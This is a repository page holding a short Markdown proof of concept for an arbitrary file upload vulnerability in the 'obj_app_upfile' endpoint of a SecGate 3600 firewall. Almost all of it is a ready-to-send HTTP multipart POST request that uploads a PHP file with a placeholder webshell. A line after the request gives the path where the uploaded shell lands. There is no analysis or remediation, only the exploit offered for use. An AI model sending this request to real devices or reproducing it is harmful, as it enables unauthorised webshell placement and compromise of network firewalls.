admin/POC00
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
POC00/某神 SecGate 3600 防火墙 obj_app_upfile 任意文件上传漏洞.md

33 lines
918 B
Markdown
Raw Normal View History

Create 某神 SecGate 3600 防火墙 obj_app_upfile 任意文件上传漏洞.md
2023-08-19 20:13:20 +08:00
## 某神 SecGate 3600 防火墙 obj_app_upfile 任意文件上传漏洞
```
POST /?g=obj_app_upfile HTTP/1.1
Host: x.x.x.x
Accept: /
Accept-Encoding: gzip, deflate
Content-Length: 574
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryJpMyThWnAxbcBBQc
User-Agent: Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.0; Trident/4.0)
------WebKitFormBoundaryJpMyThWnAxbcBBQc
Content-Disposition: form-data; name="MAX_FILE_SIZE"
10000000
------WebKitFormBoundaryJpMyThWnAxbcBBQc
Content-Disposition: form-data; name="upfile"; filename="vulntest.php"
Content-Type: text/plain
<?php php马?>
------WebKitFormBoundaryJpMyThWnAxbcBBQc
Content-Disposition: form-data; name="submit_post"
obj_app_upfile
------WebKitFormBoundaryJpMyThWnAxbcBBQc
Content-Disposition: form-data; name="__hash__"
0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundaryJpMyThWnAxbcBBQc--
马儿路径attachements/xxx.php
```
Reference in New Issue Copy Permalink